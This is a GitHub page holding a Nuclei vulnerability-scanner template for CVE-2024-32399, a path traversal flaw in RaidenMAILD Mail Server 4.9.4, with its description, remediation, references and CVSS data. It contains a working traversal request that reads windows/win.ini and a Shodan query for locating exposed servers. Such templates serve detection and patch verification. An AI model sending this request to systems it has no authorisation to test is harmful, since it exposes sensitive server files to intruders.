forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2024-32399.yaml
More file actions
46 lines (43 loc) · 1.56 KB
/
CVE-2024-32399.yaml
File metadata and controls
46 lines (43 loc) · 1.56 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
id: CVE-2024-32399
info:
name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
author: DhiyaneshDK
severity: high
description: |
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
impact: |
Attackers can traverse directories to obtain sensitive information from the mail server.
remediation: |
Update RaidenMAILD to a version later than 4.9.4 that patches the directory traversal vulnerability.
reference:
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
- https://github.com/NN0b0dy/c01/blob/main/01.pdf
- https://github.com/NN0b0dy/CVE-2024-32399
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cve-id: CVE-2024-32399
cwe-id: CWE-22
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L
cvss-score: 7.6
epss-score: 0.83509
epss-percentile: 0.99261
cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"RaidenMAILD"
product: raidenmaild
vendor: raidenmaild
tags: cve,cve2024,lfi,raiden,mail,server,vuln
http:
- method: GET
path:
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "[fonts]", "for 16-bit app support")'
- 'contains(header, "application/octet-stream")'
- 'status_code == 200'
condition: and